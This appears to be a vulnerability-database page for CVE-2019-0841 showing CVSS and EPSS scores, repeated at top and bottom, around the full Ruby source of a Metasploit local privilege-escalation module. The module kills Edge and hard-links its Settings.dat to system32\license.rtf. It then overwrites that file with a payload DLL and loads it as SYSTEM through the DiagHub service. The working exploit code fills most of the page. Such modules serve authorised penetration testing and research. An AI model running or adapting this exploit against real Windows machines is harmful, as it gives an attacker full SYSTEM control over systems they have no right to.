7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
7.2 High
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C
0.866 High
EPSS
Percentile
98.6%
There exists a privilege escalation vulnerability for Windows 10 builds prior to build 17763. Due to the AppXSvcâs improper handling of hard links, a user can gain full privileges over a SYSTEM-owned file. The user can then utilize the new file to execute code as SYSTEM. This module employs a technique using the Diagnostics Hub Standard Collector Service (DiagHub) which was discovered by James Forshaw to load and execute a DLL as SYSTEM.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Exploit::EXE
include Post::File
include Post::Windows::Priv
include Post::Windows::FileInfo
include Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'AppXSvc Hard Link Privilege Escalation',
'Description' => %q{
There exists a privilege escalation vulnerability for
Windows 10 builds prior to build 17763. Due to the AppXSvc's
improper handling of hard links, a user can gain full
privileges over a SYSTEM-owned file. The user can then utilize
the new file to execute code as SYSTEM.
This module employs a technique using the Diagnostics Hub Standard
Collector Service (DiagHub) which was discovered by James Forshaw to
load and execute a DLL as SYSTEM.
},
'License' => MSF_LICENSE,
'Author' => [
'Nabeel Ahmed', # Vulnerability discovery and PoC
'James Forshaw', # Code creating hard links and communicating with DiagHub service
'Shelby Pace' # Metasploit module
],
'References' => [
[ 'CVE', '2019-0841' ],
[ 'URL', 'https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/' ],
[ 'URL', 'https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html' ],
[ 'URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html' ],
[ 'URL', 'https://0x00-0x00.github.io/research/2019/05/30/Coding-a-reliable-CVE-2019-0841-Bypass.html' ]
],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [
[ 'Windows 10', { 'Platform' => 'win' } ]
],
'DisclosureDate' => '2019-04-09',
'DefaultTarget' => 0
)
)
end
def check
version = get_version_info
if version.build_number.between?(Msf::WindowsVersion::Win10_InitialRelease, Msf::WindowsVersion::Win10_1803)
return CheckCode::Appears
elsif version.build_number >= Msf::WindowsVersion::Win10_InitialRelease
return CheckCode::Detected
end
return CheckCode::Unknown
end
def upload_file(file_name, file_path)
contents = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-0841', file_name))
write_file(file_path, contents)
register_file_for_cleanup(file_path)
rescue StandardError
fail_with(Failure::UnexpectedReply, 'Failed to write file contents to target')
end
def init_process
print_status('Attempting to launch Microsoft Edge minimized.')
cmd_exec('cmd.exe /c start /min microsoft-edge:', nil, 30)
end
def mk_hard_link(src, target, link_exe)
out = cmd_exec("cmd.exe /c #{link_exe} \"#{src}\" \"#{target}\"")
return (out && out.include?('Done'))
end
def write_payload
print_status('Writing the payload to disk')
code = generate_payload_dll
@original_data = read_file(@rtf_path)
write_file(@rtf_path, code)
end
def exploit
vuln_status = check
fail_with(Failure::NotVulnerable, 'Failed to detect Windows 10') if vuln_status == CheckCode::Unknown
fail_with(Failure::None, 'Already running with SYSTEM privileges') if is_system?
cmd_exec('taskkill /F /IM MicrosoftEdge.exe /FI "STATUS eq RUNNING"')
dat_path = expand_path('%USERPROFILE%\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\Settings.dat')
fail_with(Failure::NotFound, 'Path does not exist') unless exist?(dat_path)
if session.arch == ARCH_X86
exe_name = 'CVE-2019-0841_x86.exe'
f_name = 'diaghub_load_x86.exe'
elsif session.arch == ARCH_X64
exe_name = 'CVE-2019-0841_x64.exe'
f_name = 'diaghub_load_x64.exe'
end
link_file_name = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(6...8)}.exe")
upload_file(exe_name, link_file_name)
@rtf_path = expand_path('%WINDIR%\\system32\\license.rtf')
fail_with(Failure::UnexpectedReply, 'Did not retrieve expected output') unless mk_hard_link(dat_path, @rtf_path, link_file_name)
print_good('Successfully created hard link')
init_process
cmd_exec('taskkill /F /IM MicrosoftEdge.exe')
write_payload
diaghub_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(8..12)}")
upload_file(f_name, diaghub_path)
cmd = "\"#{diaghub_path}\" \"license.rtf\""
cmd_exec(cmd)
end
def cleanup
folder_path = expand_path('%TEMP%\\etw')
dir_rm(folder_path)
unless @rtf_path.nil?
write_file(@rtf_path, @original_data)
end
super
end
end
7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
7.2 High
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C
0.866 High
EPSS
Percentile
98.6%